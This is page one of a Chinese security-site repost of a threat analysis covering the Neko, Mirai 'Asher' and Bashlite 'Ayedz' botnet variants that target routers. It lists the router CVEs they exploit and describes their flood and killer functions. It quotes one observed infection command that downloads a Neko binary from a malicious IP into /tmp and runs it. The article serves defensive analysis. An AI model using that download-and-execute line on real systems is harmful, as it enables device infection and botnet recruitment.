欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

三款恶意软件同时目标锁定路由器

来源:本站整理 作者:佚名 时间:2019-09-02 TAG: 我要投稿

近期发现了3款恶意软件变种——Neko,Mirai和Bashlite。在2019年7月22日,我们发现了Neko僵尸网络的恶意软件样本,并马上开始对其进行分析,接下来我们又发现了另外一个样本,相比之前增加了额外的漏洞利用方法。7月30日,又出现了一个名为“Asher”的Mirai变种,而在这之后,又发现了一个名为“Ayedz”的Bashlite变种。列出的这些恶意软件变种可以将路由器感染为僵尸网络中的设备,能够发起分布式拒绝服务(DDoS)攻击。
Neko
7月22日,我们的蜜罐检测到一个僵尸网络的恶意软件样本,x86.neko(被Trend Micro检测为Backdoor.Linux.NEKO.AB),该样本具有弱口令爆破的功能,之后会执行以下命令:
“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”
我们的研究表明这个僵尸网络恶意软件在多种处理器架构下都有相应版本存在。根据分析,我们发现Neko僵尸网络能够执行多条后门指令:既能执行shell命令,又能发起UDP和UPD-HEX泛洪攻击,从而致瘫路由器正常处理和响应信息的能力。Neko还有结束进程(程序中的“killer”功能)的功能。同时其内部还存有一个可扩展的“死亡名单”——包含其他恶意软件相关的进程列表,如有存在即会结束相关进程。对Neko僵尸网络更深入的代码分析显示它还带有一个能够查找多种漏洞利用方式的扫描器,从而使其能够传染到其他有漏洞的设备中。
1、Eir WAN端远程命令注入(TR-064)——Eir D1000路由器的一个广域网(WAN)端RCE漏洞
2、HNAP SOAPAction-Header 命令执行(CVE-2015-2051)——由错误处理恶意HTTP请求造成的多个D-Link路由器的RCE漏洞
3、华为路由器HFG532——任意命令执行(CVE-2017-17215)——由验证某个配置文件不当造成的华为HG532上的RCE漏洞
4、GPON路由器——认证绕过/命令注入(CVE-2018-10561,CVE-2018-10562)——由认证绕过和命令注入造成的DASAN GPON家用路由器的RCE漏洞
5、Linksys E系列——远程代码执行——由未经身份认证和操作系统命令注入造成的RCE漏洞
6、MVPower Shell命令执行——利用了MVPower数字视频录像机(DVRs)中未经身份认证的RCE漏洞
7、ThinkPHP 5.0.23/5.1.31 RCE ——开源web开发框架ThinkPHP 5.0.23/5.1.31的RCE漏洞
8、Realtek SDK – Miniigd UPnP SOAP 命令执行(CVE-2014-8361)——使用了Realtek SDK中的miniigd程序的设备,由未经身份认证和操作系统命令注入造成RCE漏洞
除了以上的漏洞利用,我们还发现Neko僵尸网络同时扫描了有漏洞的Africo设备。我们还无法确定Neko为了扫描哪款Africo设备,同时我们注意到这一扫描和任何一个漏洞利用都没有什么联系。但是,我们发现这一漏洞的结构和网件DGN1000/DGN2200等DGN设备的未认证RCE漏洞有相似之处。

图1 Neko僵尸网络恶意软件代码显示其是如何扫描Africo设备的
7月29日,蜜罐收集到了一个升级的Neko僵尸网络恶意软件样本(检测为Backdoor.Linux.NEKO.AC)。这一次,文件使用了UPX进行加壳保护,并把UPX的特征魔数(UPX!)进行了修改,从而防止被脱壳。

图2 UPX加壳并修改了UPX特征魔数的Neko僵尸网络恶意软件代码
我们发现这个新的样本的扫描功能更加强大了,并且使用了更多的漏洞利用方式进行感染传播。有趣的是,其漏洞利用列表现已加入网件DGN1000/DGN2200——而该漏洞结构和之前说的Africo扫描具有相似之处。

图3 Neko僵尸网络恶意软件代码显示其是如何扫描网件DGN1000/DGN2200的
新版本的Neko也对多种CCTV-DVR设备和网件R7000、R6400路由器(2016-6277)进行了扫描。

图4和图5 Neko僵尸网络恶意软件代码显示其是如何扫描
多种CCTV-DVR设备和网件R7000、R6400路由器的
Neko变种对“awsec”也进行扫描,而这一漏洞结构和Vacron NVR RCE相似。

图6 Neko僵尸网络恶意软件代码显示其是如何扫描“awsec”的
此外,该Neko变种还会尝试扫描“cisco”和“wap54g”。但是,根据分析,这两条命令都无法成功实现漏洞利用。“Cisco”尝试使用CVE-2018-15379——Cisco Prime Infrastructure中的HTTP web服务器存在目录权限配置不当的问题,从而导致RCE。但是该样本中的攻击载荷未使用正确的URL路径,因此漏洞利用没有成功。

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载